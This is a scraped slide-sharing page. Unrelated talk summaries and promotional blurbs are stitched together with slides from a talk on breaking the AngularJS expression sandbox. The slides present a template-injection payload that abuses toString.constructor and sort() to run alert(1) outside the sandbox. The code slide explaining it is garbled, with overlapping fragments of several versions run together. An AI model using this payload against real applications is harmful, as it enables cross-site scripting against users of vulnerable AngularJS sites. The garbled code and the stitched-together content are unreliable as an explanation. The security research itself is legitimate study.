This document provides an overview of JavaScript basics. It discusses how websites have evolved from static pages using frames to highly interactive single page applications thanks to JavaScript. JavaScript runs in the browser and allows for interactivity through manipulating the DOM, doing calculations, fetching data, and more. The document explains how to embed JavaScript using <script> tags and control execution timing. It also covers fundamental concepts like objects, properties, methods, events, and event handlers. Code demos are provided to demonstrate "Hello World", events, scope, and using AJAX with events.
The document provides an introduction to developing complex front-end applications using HTML and JavaScript. It discusses how JavaScript modules can be organized in a way that is similar to frameworks like WPF and Silverlight using simple constructs like the module pattern. It also covers asynchronous module definition (AMD) and how modules can be loaded and dependencies managed using RequireJS. The document demonstrates unit testing jQuery code and using pubsub for loose coupling between modules. Finally, it discusses how CSS compilers like SASS can make CSS authoring more productive by allowing variables, nesting and mixins.
Node.js is a JavaScript runtime built on Chrome's V8 engine that makes building network and server-side applications quick and easy. It is commonly used with AngularJS (Angular) for the front-end to create full-stack JavaScript (MEAN stack) applications. Node.js uses an event-driven, non-blocking I/O model that makes it lightweight and efficient. Common uses of Node.js include building real-time applications, working with files and streams, and using modules to reuse and share code. MongoDB is often used as the database for MEAN stack applications and Mongoose provides an ORM for interacting with MongoDB from Node.js applications. Angular is a front-end web application framework that
This document discusses 3D graphics techniques using CSS3, jQuery, CSS shaders, and WebGL. It provides demonstrations of 3D effects created with only CSS3 and jQuery mobile code. CSS shaders and WebGL allow more complex 3D graphics by using vertex and fragment shaders. Toolkits like Three.js and tQuery.js simplify working with WebGL. The document recommends books and meetups for learning more about these technologies.
This document provides an introduction to jQuery, covering its features, comparisons to other frameworks, selectors, and plugins. jQuery is an open-source JavaScript library that simplifies DOM manipulation, event handling, animations, and Ajax interactions. It uses CSS-style selectors to select and manipulate HTML elements. Some key features include DOM element selections, DOM traversal/modification, DOM manipulation based on CSS selectors, events, effects/animations, Ajax, and extensibility through plugins. The document also discusses jQuery versus other frameworks like Dojo and YUI, demonstrates basic selectors and methods, and encourages the use of plugins to add additional functionality.
Yeoman AngularJS and D3 - A solid stack for web appsclimboid
This was a course given in Bangalore India for JSChannel conf 2013. It encompases the use of angular js and d3 in a harmonious way and gives an overview over each of the frameworks / libraries.
JSMVCOMFG - To sternly look at JavaScript MVC and Templating FrameworksMario Heiderich
The document discusses JavaScript MVC and templating frameworks and security issues found during penetration testing. Several frameworks were found to execute arbitrary JavaScript from markup in dangerous ways due to overuse of eval-like functions and lack of separation between code and content. This could lead to bypassing of content security policies. Metrics are proposed to evaluate frameworks on security practices like sandboxing and preventing injection into templates. While challenges exist, following best practices like strict separation of code and content could help frameworks improve security.
The document discusses frameworkless web development in Clojure using libraries like Ring, Clout, Compojure, Hiccup, Enlive, and Friend. Ring provides HTTP abstraction, Clout and Compojure handle routing, Hiccup and Enlive are used for HTML templating, and Friend handles authentication. These libraries can be composed to build web applications without a large framework by leveraging Clojure's data structures and functions.
This document introduces jQuery, including its environment, implementation, and use with jQuery UI. jQuery is a JavaScript library that simplifies client-side scripting by providing methods for selecting elements, handling events, performing animations and AJAX requests, and manipulating the DOM. The document provides examples of using jQuery for these tasks and binding jQuery UI widgets like tabs.
SPTechCon - Share point and jquery essentialsMark Rackley
This document provides an outline for a workshop on using jQuery and SharePoint. The workshop will cover jQuery overview and common methods, deployment and development tools and techniques, interacting with SharePoint and the DOM, reading and writing SharePoint list data, using third party jQuery libraries, and building a sample application. Key topics include jQuery vs JavaScript, common jQuery methods, debugging tools, retrieving and updating SharePoint fields, SPServices vs client object model, and recommendations for third party jQuery libraries.
As developers, we know what good and bad JavaScript APIs "feel" like, and yet we struggle with designing the kind of APIs that we enjoy using. But principles of good JavaScript API design do exist, and it's possible to extract them from several key libraries in the the proliferating JavaScript landscape. In this session, Brandon Satrom will do exactly that, digging into the design aspects of popular libraries like jQuery, Backbone, Knockout, Modernizer, Kendo UI and others to enumerate the designed-in qualities of these libraries that make them not only popular, but a pleasure to use.
The document appears to be a presentation about using jQuery with SharePoint. It discusses open wireless access being available and encourages attendees to tweet about the session and blog. It then provides information about the presenter and their background as well as an outline of the topics to be covered in the presentation, including what jQuery is, how to deploy and develop with it, interacting with SharePoint and the DOM, reading and writing list data, using third party libraries, and demos.
Leaving Flatland: Getting Started with WebGL- SXSW 2012philogb
This document discusses getting started with WebGL. It begins with an introduction to WebGL, explaining that it allows 3D graphics in browsers similarly to OpenGL. It then provides examples of what can be done with WebGL, such as data visualization, games, 3D modeling, and more. The document proceeds to explain the basic graphics pipeline and JavaScript API used in WebGL. It concludes by discussing how to set up a basic 3D scene and choose a WebGL library like Three.js or PhiloGL to get started creating WebGL applications.
1) Rachel Andrew discusses considerations when choosing tools and frameworks for front-end development projects, emphasizing progressive enhancement and ensuring the core experience works for all.
2) She argues against over-reliance on frameworks, which can mask issues and prevent learning core skills. Frameworks should be used lightly and evaluated on a case-by-case basis.
3) Andrew talks about the importance of standards-based development and contributing to emerging specifications like CSS Grid Layout, rather than depending entirely on pre-processors. Her goal is to encourage continued progress of the open web.
JavaScript basics
JavaScript event loop
Ajax and promises
DOM interaction
JavaScript object orientation
Web Workers
Useful Microframeworks
This presentation has been developed in the context of the Mobile Applications Development course, DISIM, University of L'Aquila (Italy), Spring 2015.
http://www.ivanomalavolta.com
This document provides an overview of the Grails web framework, including comparisons to other Java web frameworks. It discusses the differences between static and dynamic programming languages and covers Groovy and Grails features such as conventions over configuration, object relational mapping, validation, security, and common tags. The document also provides information on Grails project structure, configuration, and popular plugins.
Similar to Breaking AngularJS Javascript sandbox (20)
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdfFlorence Consulting
Quattordicesimo Meetup di Milano, tenutosi a Milano il 23 Maggio 2024 dalle ore 17:00 alle ore 18:30 in presenza e da remoto.
Abbiamo parlato di come Axpo Italia S.p.A. ha ridotto il technical debt migrando le proprie APIs da Mule 3.9 a Mule 4.4 passando anche da on-premises a CloudHub 1.0.
Instagram has become one of the most popular social media platforms, allowing people to share photos, videos, and stories with their followers. Sometimes, though, you might want to view someone's story without them knowing.
Gen Z and the marketplaces - let's translate their needsLaura Szabó
The product workshop focused on exploring the requirements of Generation Z in relation to marketplace dynamics. We delved into their specific needs, examined the specifics in their shopping preferences, and analyzed their preferred methods for accessing information and making purchases within a marketplace. Through the study of real-life cases , we tried to gain valuable insights into enhancing the marketplace experience for Generation Z.
The workshop was held on the DMA Conference in Vienna June 2024.
Understanding User Behavior with Google Analytics.pdfSEO Article Boost
Unlocking the full potential of Google Analytics is crucial for understanding and optimizing your website’s performance. This guide dives deep into the essential aspects of Google Analytics, from analyzing traffic sources to understanding user demographics and tracking user engagement.
Traffic Sources Analysis:
Discover where your website traffic originates. By examining the Acquisition section, you can identify whether visitors come from organic search, paid campaigns, direct visits, social media, or referral links. This knowledge helps in refining marketing strategies and optimizing resource allocation.
User Demographics Insights:
Gain a comprehensive view of your audience by exploring demographic data in the Audience section. Understand age, gender, and interests to tailor your marketing strategies effectively. Leverage this information to create personalized content and improve user engagement and conversion rates.
Tracking User Engagement:
Learn how to measure user interaction with your site through key metrics like bounce rate, average session duration, and pages per session. Enhance user experience by analyzing engagement metrics and implementing strategies to keep visitors engaged.
Conversion Rate Optimization:
Understand the importance of conversion rates and how to track them using Google Analytics. Set up Goals, analyze conversion funnels, segment your audience, and employ A/B testing to optimize your website for higher conversions. Utilize ecommerce tracking and multi-channel funnels for a detailed view of your sales performance and marketing channel contributions.
Custom Reports and Dashboards:
Create custom reports and dashboards to visualize and interpret data relevant to your business goals. Use advanced filters, segments, and visualization options to gain deeper insights. Incorporate custom dimensions and metrics for tailored data analysis. Integrate external data sources to enrich your analytics and make well-informed decisions.
This guide is designed to help you harness the power of Google Analytics for making data-driven decisions that enhance website performance and achieve your digital marketing objectives. Whether you are looking to improve SEO, refine your social media strategy, or boost conversion rates, understanding and utilizing Google Analytics is essential for your success.
2. What is AngularJS? And
where’s the sandbox?
• Javascript framework for building single page web
applications.
• Mustache style templates: Having <h1>{{1+2+3}}</h1>
anywhere in Angular HTML app will render <h1>6</h1>
• Template expressions are evaluated with Javascript
• Template expression Javascript is sandboxed - It can’t
reach [object Window] or DOM
• If we could access dangerous objects from templates, we
could XSS any AngularJS app that prints user data in
Angular bound HTML
3. Executing JS… From JS
• eval() - Unavailable under window
• document.write - Unavailable under document
• location=“javascript:” - Unavailable under
document
• Function(“code”)() - Unavailable under blacklist
• What else is there?
5. The how
if(if((toString.Function("compareFunction(function(constructor.a){a", alert("alert(1)}) 1)}).element1, 1)") prototype.== toString() == 1){
1){
element2) toString=
== 1..toString()){
== 1){
toString.//{{sort toString.element constructor.constructor.as bigger
prototype.prototype.call;
toString=
}else if((function(["if(… a","toString.alert(== a){0){
1)"].alert(constructor.sort(1)}).Function);
call() prototype.== 1..toString()){
call;
//sort element as same
}else{
//sort element as smaller
}
//sort element as bigger
}else if(… == 0){
//sort element as same
}else{
//sort element as smaller
}
toString.constructor);
[“a”,”alert(1)”].sort(toString.constructor)}}
alert(1)